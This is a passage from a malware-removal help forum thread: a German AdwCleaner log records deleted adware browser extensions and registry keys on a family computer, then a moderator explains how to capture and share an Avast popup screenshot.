[!] Ordner Gelöscht : C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\ASPNET\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\Mama\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj
[!] Ordner Gelöscht : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngohningfjdmdhlhokngnldcgmnkgldf
[!] Ordner Gelöscht : C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngohningfjdmdhlhokngnldcgmnkgldf
[!] Ordner Gelöscht : C:\Users\Mama\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngohningfjdmdhlhokngnldcgmnkgldf
 
***** [ Tasks ] *****
 
 
***** [ Verknüpfungen ] *****
 
 
***** [ Registrierungsdatenbank ] *****
 
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{74F475FA-6C75-43BD-AAB9-ECDA6184F600}
Schlüssel Gelöscht : HKLM\SOFTWARE\VBMZ
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{62D82EC1-0D3A-DF54-8E3E-07E1337A5311}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6592FDEC-2C1A-413A-9985-25FEC2F0848D}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\08121C32A9C319F4CB0C11FF059552A4
 
***** [ Browser ] *****
 
-\\ Internet Explorer v9.0.8112.16476
 
 
-\\ Mozilla Firefox v8.0 (de)
 
[ Datei : C:\Users\Gast\AppData\Roaming\Mozilla\Firefox\Profiles\rqefd106.default\prefs.js ]
 
 
[ Datei : C:\Users\Kenh\AppData\Roaming\Mozilla\Firefox\Profiles\aeqtjz41.default\prefs.js ]
 
 
[ Datei : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\prefs.js ]
 
 
[ Datei : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\Mozilla\Firefox\Profiles\1evgh2ff.default\prefs.js ]
 
 
-\\ Google Chrome v36.0.1985.143
 
[ Datei : C:\Users\Gast\AppData\Local\Google\Chrome\User Data\Default\preferences ]
 
Gelöscht [Extension] : ngohningfjdmdhlhokngnldcgmnkgldf
Gelöscht [Extension] : kfpalkgedhkiepplgnlmmlbjnkoaompj
 
[ Datei : C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\preferences ]
 
Gelöscht [Extension] : kfpalkgedhkiepplgnlmmlbjnkoaompj
 
[ Datei : C:\Users\Mama\AppData\Local\Google\Chrome\User Data\Default\preferences ]
 
Gelöscht [Extension] : ngohningfjdmdhlhokngnldcgmnkgldf
Gelöscht [Extension] : kfpalkgedhkiepplgnlmmlbjnkoaompj
 
[ Datei : C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\preferences ]
 
Gelöscht [Extension] : kfpalkgedhkiepplgnlmmlbjnkoaompj
Gelöscht [Extension] : ngohningfjdmdhlhokngnldcgmnkgldf
 
[ Datei : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\preferences ]
 
 
*************************
 
AdwCleaner[R0].txt - [70423 octets] - [12/08/2014 17:50:54]
AdwCleaner[R1].txt - [8497 octets] - [23/08/2014 09:57:01]
AdwCleaner[S0].txt - [67076 octets] - [12/08/2014 17:57:07]
AdwCleaner[S1].txt - [8560 octets] - [23/08/2014 10:00:03]
 
########## EOF - \AdwCleaner\AdwCleaner[S1].txt - [8620 octets] ##########
 


  • 0

#14
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
Certainly, first use the snipping tool, there are instructions here for that http://windows.micro...s/snipping-tool

To get the Avast alert :

Right click the Avast icon and select "show last popup message"
Then using the snipping tool cut that and save to your desktop, then attach to your next post
  • 0

#15
langvu900

langvu900

    Member

  • Topic Starter
  • Member
  • PipPip
  • 11 posts

I'm sorry, for somehow i can't attach the img, so i put it on flicker.

 

https://www.flickr.c...04/14818374917/

 

It's just a simple "avast is not just antivirus" advice, but it pop-ups alot. 


  • 0






Similar Topics


Also tagged with one or more of these keywords: razor1911, sim city 5, infection

1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP